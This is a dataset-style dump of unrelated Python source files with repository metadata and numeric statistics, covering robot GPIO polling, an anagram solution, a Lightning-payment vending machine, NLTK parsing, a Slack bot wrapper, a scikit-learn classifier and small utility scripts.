2019-01-03T04:47:13.000Z
|
2022-03-18T06:40:59.000Z
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2019, UFACTORY, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>
"""
Example: Get GPIO Digital
"""
import os
import sys
import time
sys.path.append(os.path.join(os.path.dirname(__file__), '../../..'))
from xarm.wrapper import XArmAPI
from configparser import ConfigParser
parser = ConfigParser()
parser.read('../robot.conf')
try:
ip = parser.get('xArm', 'ip')
except Exception:
ip = input('Please input the xArm ip address[192.168.1.194]:')
if not ip:
ip = '192.168.1.194'
arm = XArmAPI(ip)
time.sleep(0.5)
if arm.warn_code != 0:
arm.clean_warn()
if arm.error_code != 0:
arm.clean_error()
last_digitals = [-1, -1]
while arm.connected and arm.error_code != 19 and arm.error_code != 28:
code, digitals = arm.get_tgpio_digital()
if code == 0:
if digitals[0] == 1 and digitals[0] != last_digitals[0]:
print('IO0 input high level')
if digitals[1] == 1 and digitals[1] != last_digitals[1]:
print('IO1 input high level')
last_digitals = digitals
time.sleep(0.1)
| 23.44
| 70
| 0.648464
| 175
| 1,172
| 4.251429
| 0.451429
| 0.064516
| 0.048387
| 0.026882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051064
| 0.197952
| 1,172
| 49
| 71
| 23.918367
| 0.740426
| 0.176621
| 0
| 0
| 0
| 0
| 0.135021
| 0.024262
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56057ff5dbd4cdc1d25d244ff87b18b26455492
| 544
|
py
|
Python
|
49-group anagrams/main.py
|
ytong82/leetcode
|
34e08c430d654b14b1608211f74702f57e507189
|
[
"Apache-2.0"
] | null | null | null |
49-group anagrams/main.py
|
ytong82/leetcode
|
34e08c430d654b14b1608211f74702f57e507189
|
[
"Apache-2.0"
] | null | null | null |
49-group anagrams/main.py
|
ytong82/leetcode
|
34e08c430d654b14b1608211f74702f57e507189
|
[
"Apache-2.0"
] | null | null | null |
class Solution:
def groupAnagrams(self, strs):
        if not strs:
            return []
        groups = dict()  # sorted-letter signature -> indices of anagrams
        for i in range(len(strs)):
            key = ''.join(sorted(strs[i]))
            if key in groups:
                groups[key].append(i)
            else:
                groups[key] = [i]
        return [[strs[k] for k in indices] for indices in groups.values()]
strs = ["eat", "tea", "tan", "ate", "nat", "bat"]
sol = Solution()
print(sol.groupAnagrams(strs))
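# --- Added variant (not in the original file): an equivalent, more idiomatic
# grouping with collections.defaultdict, keyed on the sorted-letter signature.
from collections import defaultdict

def group_anagrams_defaultdict(strs):
    groups = defaultdict(list)  # signature -> words sharing that signature
    for s in strs:
        groups[''.join(sorted(s))].append(s)
    return list(groups.values())

print(group_anagrams_defaultdict(strs))  # same grouping as Solution.groupAnagrams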
| 22.666667
| 51
| 0.443015
| 68
| 544
| 3.544118
| 0.485294
| 0.062241
| 0.06639
| 0.099585
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00304
| 0.395221
| 544
| 24
| 52
| 22.666667
| 0.729483
| 0
| 0
| 0
| 0
| 0
| 0.033028
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0
| 0
| 0.210526
| 0.052632
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b561af012e5087c35cc2997a33fe02fbbdb5ae5d
| 2,429
|
py
|
Python
|
vending.py
|
mit-dci/litvending
|
28f8f2b51691eac7c69de153aafbe72663d9892c
|
[
"MIT"
] | 1
|
2018-06-20T01:42:54.000Z
|
2018-06-20T01:42:54.000Z
|
vending.py
|
mit-dci/litvending
|
28f8f2b51691eac7c69de153aafbe72663d9892c
|
[
"MIT"
] | null | null | null |
vending.py
|
mit-dci/litvending
|
28f8f2b51691eac7c69de153aafbe72663d9892c
|
[
"MIT"
] | 1
|
2022-02-15T06:48:15.000Z
|
2022-02-15T06:48:15.000Z
|
#!/usr/bin/env python3
import os
import time
import sys
gpio = None
try:
import RPi.GPIO
gpio = RPi.GPIO
except ImportError:
print('RPi library not found. We\'re probably on a dev machine. Moving on...')
import lvconfig
import litrpc
# This could be more efficient; we're making a lot more requests than we need to.
def check_deposit(cointype):
bals = conn.balance()['Balances']
sum = 0
for b in bals:
if b['CoinType'] == int(cointype):
# I'm not sure how this works, can it return dupes?
sum += b['ChanTotal'] + b['TxoTotal']
return sum
def main(cfg):
if cfg['trigger_pin_num'] == -1:
print('You need to configure me first. Come back later.')
sys.exit(1)
# Find important commonly-used variables.
trigger_pin = cfg['trigger_pin_num']
sleep_time = cfg['pin_high_time']
deposit_delay = cfg['deposit_delay_time']
# Set up the GPIO pins.
if gpio is not None:
gpio.setmode(gpio.BOARD)
gpio.setwarnings(False)
gpio.setup(trigger_pin, gpio.OUT)
# Set up the connection and connect.
print('Connecting to lit at', cfg['lit_ip'], 'on port', cfg['lit_port'])
global conn
conn = litrpc.LitClient(cfg['lit_ip'], cfg['lit_port'])
print('Set up client.')
# Then just enter the main loop.
print('Waiting for payment...')
last_bal = {}
for ty in cfg['coin_type_ids']:
last_bal[ty] = -1
while True:
# First figure out how much might have been sent to us.
to_insert = 0
for ty in cfg['coin_type_ids']:
bal = check_deposit(ty)
if last_bal[ty] != -1:
diff = bal - last_bal[ty]
if diff <= 0: # when we withdraw it would break everything
continue
unit_cost = cfg['unit_costs'][ty]
units = int(diff // unit_cost)
extra = diff - units * unit_cost
to_insert += units
print('Balance for', ty, 'is now', bal, ', got a spend of', diff, 'sat worth', units, 'units with an extra', extra, 'sat left over')
last_bal[ty] = bal
# Then send that many quarters.
if to_insert != 0:
print('Total to insert:', to_insert)
if gpio is not None:
for i in range(to_insert):
# Just turn it on, wait a bit, and turn it off.
gpio.output(trigger_pin, gpio.HIGH)
time.sleep(sleep_time)
gpio.output(trigger_pin, gpio.LOW)
time.sleep(deposit_delay)
print('Done')
else:
print('Not running on RPi, doing nothing!')
else:
print('No payment')
time.sleep(cfg['poll_rate'])
if __name__ == '__main__':
main(lvconfig.load_config())
| 26.11828
| 136
| 0.669823
| 393
| 2,429
| 4.012723
| 0.445293
| 0.038047
| 0.022828
| 0.020292
| 0.076094
| 0.026633
| 0.026633
| 0
| 0
| 0
| 0
| 0.004639
| 0.201317
| 2,429
| 92
| 137
| 26.402174
| 0.808247
| 0.186085
| 0
| 0.089552
| 0
| 0
| 0.229908
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029851
| false
| 0
| 0.089552
| 0
| 0.134328
| 0.149254
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56b02915f5cdfb61babcb70fc1c32bc2970b2fa
| 597
|
py
|
Python
|
Section02/ParsingChart.py
|
fosterleejoe/Developing-NLP-Applications-Using-NLTK-in-Python
|
f2cac32c02d0632fb89f32446388ef15d9926bbc
|
[
"MIT"
] | 67
|
2017-11-23T18:48:47.000Z
|
2022-03-29T08:03:25.000Z
|
Section02/ParsingChart.py
|
fosterleejoe/Developing-NLP-Applications-Using-NLTK-in-Python
|
f2cac32c02d0632fb89f32446388ef15d9926bbc
|
[
"MIT"
] | null | null | null |
Section02/ParsingChart.py
|
fosterleejoe/Developing-NLP-Applications-Using-NLTK-in-Python
|
f2cac32c02d0632fb89f32446388ef15d9926bbc
|
[
"MIT"
] | 49
|
2017-12-06T16:10:14.000Z
|
2021-11-25T09:02:49.000Z
|
from nltk.grammar import CFG
from nltk.parse.chart import ChartParser, BU_LC_STRATEGY
grammar = CFG.fromstring("""
S -> T1 T4
T1 -> NNP VBZ
T2 -> DT NN
T3 -> IN NNP
T4 -> T3 | T2 T3
NNP -> 'Tajmahal' | 'Agra' | 'Bangalore' | 'Karnataka'
VBZ -> 'is'
IN -> 'in' | 'of'
DT -> 'the'
NN -> 'capital'
""")
cp = ChartParser(grammar, BU_LC_STRATEGY, trace=True)
sentence = "Bangalore is the capital of Karnataka"
tokens = sentence.split()
chart = cp.chart_parse(tokens)
parses = list(chart.parses(grammar.start()))
print("Total Edges :", len(chart.edges()))
for tree in parses:
    print(tree)
    tree.draw()
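# --- Added example (not in the original file): a second sentence licensed by the
# same grammar, exercising the T4 -> T3 branch (S -> T1 T4 -> NNP VBZ IN NNP).
tokens2 = "Tajmahal is in Agra".split()
chart2 = cp.chart_parse(tokens2)
for tree in chart2.parses(grammar.start()):
    print(tree)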
| 22.961538
| 56
| 0.676717
| 90
| 597
| 4.433333
| 0.511111
| 0.0401
| 0.06015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017857
| 0.155779
| 597
| 25
| 57
| 23.88
| 0.77381
| 0
| 0
| 0
| 0
| 0
| 0.386935
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56c623a069eaa852720532015deec19073b3d1a
| 5,526
|
py
|
Python
|
sirbot/slack/wrapper.py
|
Ovvovy/sirbot-slack
|
2d27e49cfbc2cb12e87ef3814823d2ad68d0a788
|
[
"MIT"
] | 7
|
2017-05-06T11:37:25.000Z
|
2018-11-22T09:46:32.000Z
|
sirbot/slack/wrapper.py
|
Ovvovy/sirbot-slack
|
2d27e49cfbc2cb12e87ef3814823d2ad68d0a788
|
[
"MIT"
] | 19
|
2017-05-07T16:25:02.000Z
|
2017-09-22T08:02:59.000Z
|
sirbot/slack/wrapper.py
|
Ovvovy/sirbot-slack
|
2d27e49cfbc2cb12e87ef3814823d2ad68d0a788
|
[
"MIT"
] | 3
|
2017-05-06T11:37:28.000Z
|
2017-07-07T09:32:54.000Z
|
import logging
from .store.user import User
from .errors import SlackInactiveDispatcher, SlackNoThread
logger = logging.getLogger(__name__)
class SlackWrapper:
"""
    A class composing all the available functionality of the slack plugin.
    An instance is offered to every incoming message of all the plugins to
    allow cross-service messaging.
"""
def __init__(self, http_client, users, channels, groups, messages, threads,
bot, dispatcher):
self._http_client = http_client
self._threads = threads
self._dispatcher = dispatcher
self.messages = messages
self.users = users
self.channels = channels
self.groups = groups
self.bot = bot
async def send(self, *messages):
"""
Send the messages provided and update their timestamp
:param messages: Messages to send
"""
for message in messages:
message.frm = self.bot
if self.bot.type == 'rtm' and isinstance(message.to, User):
await self.users.ensure_dm(message.to)
if message.response_url:
                # Messages with a response url are responses to actions or
                # slash commands
data = message.serialize(type_='response')
await self._http_client.response(
data=data,
url=message.response_url
)
elif isinstance(message.to, User) and self.bot.type == 'rtm':
data = message.serialize(type_='send', to=self.bot.type)
message.raw = await self._http_client.message_send(
data=data,
token='bot'
)
elif isinstance(message.to, User) and self.bot.type == 'event':
data = message.serialize(type_='send', to=self.bot.type)
message.raw = await self._http_client.message_send(data=data)
else:
data = message.serialize(type_='send', to=self.bot.type)
message.raw = await self._http_client.message_send(data=data)
async def update(self, *messages):
"""
Update the messages provided and update their timestamp
:param messages: Messages to update
"""
for message in messages:
if isinstance(message.to, User):
await self.users.ensure_dm(message.to)
message.frm = self.bot
message.subtype = 'message_changed'
message.raw = await self._http_client.message_update(
message=message)
message.ts = message.raw.get('ts')
# await self._save_outgoing_message(message)
async def delete(self, *messages):
"""
Delete the messages provided
:param messages: Messages to delete
"""
for message in messages:
message.timestamp = await self._http_client.message_delete(message)
async def add_reaction(self, message, reaction):
"""
Add a reaction to a message
:Example:
>>> chat.add_reaction(Message, 'thumbsup')
        Add the thumbsup reaction to the message
        :param message: Message to react to
        :param reaction: Reaction to add
"""
await self._http_client.add_reaction(message, reaction)
async def delete_reaction(self, message, reaction):
"""
Delete reactions from messages
:Example:
>>> chat.delete_reaction(Message, 'thumbsup')
        Delete the thumbsup reaction from the message
        :param message: Message to remove the reaction from
        :param reaction: Reaction to delete
"""
await self._http_client.delete_reaction(message, reaction)
async def get_reactions(self, message):
"""
Query the reactions of messages
:param messages: Messages to query reaction from
:return: dictionary of reactions by message
:rtype: dict
"""
reactions = await self._http_client.get_reaction(message)
for reaction in reactions:
reaction['users'] = [
self.users.get(id_=user_id)
for user_id in reaction.get('users', list())
]
message.reactions = reactions
return reactions
def add_action(self, id_, func, public=False):
if 'action' in self._dispatcher:
self._dispatcher['action'].register(id_, func, public=public)
else:
raise SlackInactiveDispatcher
def add_event(self, event, func):
if 'event' in self._dispatcher:
self._dispatcher['event'].register(event, func)
else:
raise SlackInactiveDispatcher
def add_command(self, command, func):
if 'command' in self._dispatcher:
self._dispatcher['command'].register(command, func)
else:
raise SlackInactiveDispatcher
def add_message(self, match, func, flags=0, mention=False, admin=False,
channel_id='*'):
if 'action' in self._dispatcher:
self._dispatcher['message'].register(match, func, flags, mention,
admin, channel_id)
else:
raise SlackInactiveDispatcher
def add_thread(self, message, func, user_id='all'):
if message.thread or message.timestamp:
self._threads[message.thread or message.timestamp][user_id] = func
else:
raise SlackNoThread()
| 32.892857
| 79
| 0.596091
| 602
| 5,526
| 5.33887
| 0.19103
| 0.037337
| 0.047915
| 0.053205
| 0.398569
| 0.274113
| 0.247978
| 0.21313
| 0.21313
| 0.187617
| 0
| 0.000266
| 0.31958
| 5,526
| 167
| 80
| 33.08982
| 0.854521
| 0.05067
| 0
| 0.288889
| 0
| 0
| 0.027227
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.033333
| 0
| 0.122222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56d3d57d3b008ef213624e96067cf823658819f
| 4,321
|
py
|
Python
|
rc/returninfo/classifier.py
|
ddangelorb/gthbmining
|
a7d18623cd14a2ffd2508a4bb6a71b06a5f26215
|
[
"MIT"
] | 4
|
2019-09-17T02:53:51.000Z
|
2020-10-23T14:48:16.000Z
|
rc/returninfo/classifier.py
|
ddangelorb/gthbmining
|
a7d18623cd14a2ffd2508a4bb6a71b06a5f26215
|
[
"MIT"
] | null | null | null |
rc/returninfo/classifier.py
|
ddangelorb/gthbmining
|
a7d18623cd14a2ffd2508a4bb6a71b06a5f26215
|
[
"MIT"
] | null | null | null |
import warnings
warnings.filterwarnings('ignore') #ignore warnings to print values properly
import logging
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn import metrics
from datetime import datetime
from plotter import Plotter
class Classifier:
# constructor
def __init__(self, conn, repo_user, repo_name):
self.conn = conn
self.repository_id = self._get_repository_id(repo_user, repo_name)
self.dic_classifier = {
'decisiontree': ["../output/decisiontreeplot.png", "Decision Tree", DecisionTreeClassifier(criterion="entropy", max_depth=3)],
'naivebayes': ["../output/nbplot.png", "Naive Bayes", GaussianNB()],
'knn': ["../output/knnplot.png", "K-Nearest Neighbors (3)", KNeighborsClassifier(n_neighbors=3)]
}
logging.basicConfig(filename="../output/returninfo.log", level=logging.INFO)
def _get_repository_id(self, repo_user, repo_name):
cursor_conn = self.conn.cursor()
sql = "SELECT Id FROM Repositories WHERE Name = ?"
cursor_conn.execute(sql, ["{}/{}".format(repo_user, repo_name)])
id = 0
cursor_fetch = cursor_conn.fetchone()
if cursor_fetch:
id = cursor_fetch[0]
return id
def _print_scores(self, classifier, X, y, test_size):
# Split dataset into training set and test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=1)
        # Train the classifier passed in
classifier.fit(X_train, y_train)
# Predict the response for test dataset
y_pred = classifier.predict(X_test)
print(" Accuracy:", metrics.accuracy_score(y_test, y_pred))
logging.info(" Accuracy: {}".format(metrics.accuracy_score(y_test, y_pred)))
print(" F1-Score:", metrics.f1_score(y_test, y_pred))
logging.info(" F1-Score: {}".format(metrics.f1_score(y_test, y_pred)))
print(" Precision:", metrics.precision_score(y_test, y_pred))
logging.info(" Precision: {}".format(metrics.precision_score(y_test, y_pred)))
print(" Recall:", metrics.recall_score(y_test, y_pred))
logging.info(" Recall: {}".format(metrics.recall_score(y_test, y_pred)))
#print(" Confusion Matrix:", metrics.confusion_matrix(y_test, y_pred))
def classify(self, classifier_key):
if classifier_key in self.dic_classifier:
dic_item = self.dic_classifier[classifier_key]
classifier_path_plot_file = dic_item[0]
classifier_name = dic_item[1]
classifier_obj = dic_item[2]
print("repository_id = '{}'".format(self.repository_id))
#Get X, y arrays for classification, normalized data
sql = "SELECT AuthorInfluencer, ClosedIssues, ClosedPullRequests, ClosedIssuesInfluencer, ClosedPullRequestsInfluencer, PrereleaseClass FROM ReleasesData WHERE IdRepository = ?;"
            dataset = pd.read_sql_query(sql, self.conn, params=[str(self.repository_id)])  # params must be a sequence
X = dataset[['ClosedIssuesInfluencer', 'ClosedPullRequestsInfluencer']]
y = dataset['PrereleaseClass'] # contains the values from the "Class" column
self._print_scores(classifier_obj, X, y, test_size = 0.2)
plotter = Plotter(classifier_name, classifier_obj, X, y)
plotter.plot(classifier_path_plot_file)
print("File '{}' plotted from current data and classifier '{}'".format(classifier_path_plot_file, classifier_name))
logging.info("File '{}' plotted from current data and classifier '{}'".format(classifier_path_plot_file, classifier_name))
else:
print("{} :: classifier_key{} not found. Supported ones are: 'decisiontree', 'naivebayes', 'knn'".format(datetime.today().strftime('%Y-%m-%d-%H:%M:%S'), classifier_key))
logging.info("{} :: classifier_key{} not found. Supported ones are: 'decisiontree', 'naivebayes', 'knn'".format(datetime.today().strftime('%Y-%m-%d-%H:%M:%S'), classifier_key))
| 50.244186
| 190
| 0.682249
| 526
| 4,321
| 5.385932
| 0.288973
| 0.022944
| 0.019061
| 0.031768
| 0.249912
| 0.235792
| 0.228733
| 0.133427
| 0.133427
| 0.133427
| 0
| 0.004342
| 0.200417
| 4,321
| 85
| 191
| 50.835294
| 0.81563
| 0.076603
| 0
| 0
| 0
| 0
| 0.228586
| 0.044461
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.203125
| 0
| 0.296875
| 0.140625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56dd907e3a9ba7c7134351a3ded86b0fead6823
| 183
|
py
|
Python
|
run.py
|
sgilhuly/mire
|
8ac07af9083831a03a1901c1bb655932111ae4cf
|
[
"MIT"
] | 2
|
2020-06-15T10:51:43.000Z
|
2020-08-02T07:38:44.000Z
|
run.py
|
sgilhuly/mire
|
8ac07af9083831a03a1901c1bb655932111ae4cf
|
[
"MIT"
] | null | null | null |
run.py
|
sgilhuly/mire
|
8ac07af9083831a03a1901c1bb655932111ae4cf
|
[
"MIT"
] | 1
|
2018-05-15T04:45:37.000Z
|
2018-05-15T04:45:37.000Z
|
import sys
from app import app, socketio
if __name__ == "__main__":
if len(sys.argv) > 1:
port = int(sys.argv[1])
else:
        port = 5000
socketio.run(app, host="0.0.0.0", port=port)
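# --- Added usage note (not in the original file), assuming the `app` package is
# importable:
#   python run.py         -> serves on 0.0.0.0:5000
#   python run.py 8080    -> serves on 0.0.0.0:8080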
| 18.3
| 45
| 0.661202
| 33
| 183
| 3.424242
| 0.545455
| 0.053097
| 0.141593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065789
| 0.169399
| 183
| 10
| 45
| 18.3
| 0.677632
| 0
| 0
| 0
| 0
| 0
| 0.081522
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b56fc2f3040d889070f9fe524690dd7b2af07b3c
| 1,004
|
py
|
Python
|
pyFoam/extractForces.py
|
mjsauvinen/P4US
|
ba7bbc77a6e482f612ba5aa5f021a41fcbb23345
|
[
"MIT"
] | 4
|
2017-06-10T13:34:29.000Z
|
2021-10-08T14:33:43.000Z
|
pyFoam/extractForces.py
|
mjsauvinen/P4US
|
ba7bbc77a6e482f612ba5aa5f021a41fcbb23345
|
[
"MIT"
] | 8
|
2018-07-10T12:00:49.000Z
|
2021-09-16T13:58:59.000Z
|
pyFoam/extractForces.py
|
mjsauvinen/P4US
|
ba7bbc77a6e482f612ba5aa5f021a41fcbb23345
|
[
"MIT"
] | 6
|
2019-05-03T07:29:12.000Z
|
2022-01-21T03:10:27.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import numpy as np
import pylab as pl
from txtTools import openIOFile
# =*=*=*=* FUNCTION DEFINITIONS *=*=*=*=*=*=*=*=*=*=*=*
def isolateValues(line, stripChars):
    v = []
    sl = line.split()
    for i in range(len(sl)):  # xrange does not exist in Python 3
for sc in stripChars:
sl[i] = sl[i].strip(sc)
for s in sl:
v.append(float(s))
return v
# =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
try:
factor = sys.argv[1]
except:
factor = 1.
factor = float(factor)
f = openIOFile('forces.dat', 'r')
oc = openIOFile('forces.cmp', 'w')
ot = openIOFile('forces.tot', 'w')
lines = f.readlines()
spr = ['(',')']
Fx = np.zeros(4,float)
for l in lines[1:]:
x = np.array(isolateValues(l,spr))
if( len(x) == 13 ):
x.tofile(oc,sep=" \t"); oc.write("\n")
Fx[0] = x[0]
        for i in range(1, len(Fx)):  # xrange does not exist in Python 3
Fx[i]=factor*(x[i]+x[i+3]) # Pressure + Viscous
Fx.tofile(ot, sep=" \t"); ot.write("\n")
f.close(); oc.close(); ot.close()
| 20.489796
| 55
| 0.531873
| 150
| 1,004
| 3.56
| 0.48
| 0.089888
| 0.022472
| 0.044944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014907
| 0.198207
| 1,004
| 49
| 56
| 20.489796
| 0.648447
| 0.168327
| 0
| 0
| 0
| 0
| 0.054152
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.121212
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5742eb898932211cf75e05e216d0c94c86949cb
| 418
|
py
|
Python
|
examples/select.py
|
GBS3/cues
|
09bce776f9275b71a4028e5c59103e45d81ebed6
|
[
"MIT"
] | 1
|
2021-09-13T02:29:43.000Z
|
2021-09-13T02:29:43.000Z
|
examples/select.py
|
giosali/cues
|
09bce776f9275b71a4028e5c59103e45d81ebed6
|
[
"MIT"
] | null | null | null |
examples/select.py
|
giosali/cues
|
09bce776f9275b71a4028e5c59103e45d81ebed6
|
[
"MIT"
] | 1
|
2021-05-26T04:35:47.000Z
|
2021-05-26T04:35:47.000Z
|
"""
examples.select
===============
An example that demonstrates the Select child class.
"""
from cues.cues import Select
def main():
name = 'programming_language'
message = 'Which of these is your favorite programming language?'
options = ['Python', 'JavaScript', 'C++', 'C#']
cue = Select(name, message, options)
answer = cue.send()
print(answer)
if __name__ == '__main__':
main()
| 18.173913
| 69
| 0.629187
| 48
| 418
| 5.291667
| 0.6875
| 0.149606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205742
| 418
| 22
| 70
| 19
| 0.76506
| 0.203349
| 0
| 0
| 0
| 0
| 0.313846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.2
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b57f76841f0c85c583ef9797290a21bbf823a12e
| 2,212
|
py
|
Python
|
model_metadata/utils.py
|
csdms/model_metadata
|
62acab7ae2a152bec64bc1f52751f7a8aa1d4184
|
[
"MIT"
] | 1
|
2021-05-25T14:38:10.000Z
|
2021-05-25T14:38:10.000Z
|
model_metadata/utils.py
|
csdms/model_metadata
|
62acab7ae2a152bec64bc1f52751f7a8aa1d4184
|
[
"MIT"
] | 3
|
2018-04-05T21:50:24.000Z
|
2021-04-02T03:54:04.000Z
|
model_metadata/utils.py
|
csdms/model_metadata
|
62acab7ae2a152bec64bc1f52751f7a8aa1d4184
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
import os
import sys
from .api import install as install_mmd
def model_data_dir(name, datarootdir=None):
"""Get a model's data dir.
Parameters
----------
name : str
        The name of the model.
    datarootdir : str, optional
        Root of the shared data directory (defaults to ``sys.prefix/share``).
Returns
-------
str
The absolute path to the data directory for the model.
"""
datarootdir = datarootdir or os.path.join(sys.prefix, "share")
return os.path.join(datarootdir, "csdms", name)
def get_cmdclass(paths, cmdclass=None):
cmdclass = {} if cmdclass is None else cmdclass.copy()
if "setuptools" in sys.modules:
from setuptools.command.develop import develop as _develop
from setuptools.command.install import install as _install
else:
from distutils.command.develop import develop as _develop
from distutils.command.install import install as _install
sharedir = os.path.join(sys.prefix, "share")
class install(_install):
def run(self):
_install.run(self)
for name, path in paths:
name = name.split(":")[-1]
install_mmd(
os.path.abspath(path),
os.path.join(sharedir, "csdms", name),
silent=False,
clobber=True,
develop=False,
)
class develop(_develop):
def run(self):
_develop.run(self)
for name, path in paths:
name = name.split(":")[-1]
install_mmd(
os.path.abspath(path),
os.path.join(sharedir, "csdms", name),
silent=False,
clobber=True,
develop=True,
)
cmdclass["install"] = install
cmdclass["develop"] = develop
return cmdclass
def get_entry_points(components, entry_points=None):
entry_points = {} if entry_points is None else entry_points
pymt_plugins = entry_points.get("pymt.plugins", [])
for entry_point, _ in components:
pymt_plugins.append(entry_point)
if len(pymt_plugins) > 0:
entry_points["pymt.plugins"] = pymt_plugins
return entry_points
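# --- Added sketch (not in the original module): exercising get_cmdclass and
# get_entry_points with hypothetical placeholder values, outside any setup() call.
if __name__ == "__main__":
    import setuptools  # ensure the setuptools branch inside get_cmdclass is taken

    paths = [("pymt_child:Child", "meta/Child")]        # (name, metadata path)
    components = [("Child = pymt_child:Child", None)]   # (entry-point spec, _)
    print(sorted(get_cmdclass(paths)))                  # ['develop', 'install']
    print(get_entry_points(components))                 # {'pymt.plugins': ['Child = pymt_child:Child']}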
| 26.97561
| 66
| 0.574593
| 252
| 2,212
| 4.924603
| 0.277778
| 0.070911
| 0.04029
| 0.053183
| 0.357776
| 0.357776
| 0.26108
| 0.196616
| 0.196616
| 0.196616
| 0
| 0.002015
| 0.326854
| 2,212
| 81
| 67
| 27.308642
| 0.83143
| 0.084087
| 0
| 0.32
| 0
| 0
| 0.037821
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.14
| 0
| 0.34
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b582e5842d21e445f1825c2debc8042c425aedda
| 8,060
|
py
|
Python
|
solution/serverlist.py
|
ksh0165/lhms
|
8848a74ac5c0f309e3ab28583af4bd574575ab8a
|
[
"Apache-2.0"
] | null | null | null |
solution/serverlist.py
|
ksh0165/lhms
|
8848a74ac5c0f309e3ab28583af4bd574575ab8a
|
[
"Apache-2.0"
] | null | null | null |
solution/serverlist.py
|
ksh0165/lhms
|
8848a74ac5c0f309e3ab28583af4bd574575ab8a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
import os
import subprocess
import re
import pymysql
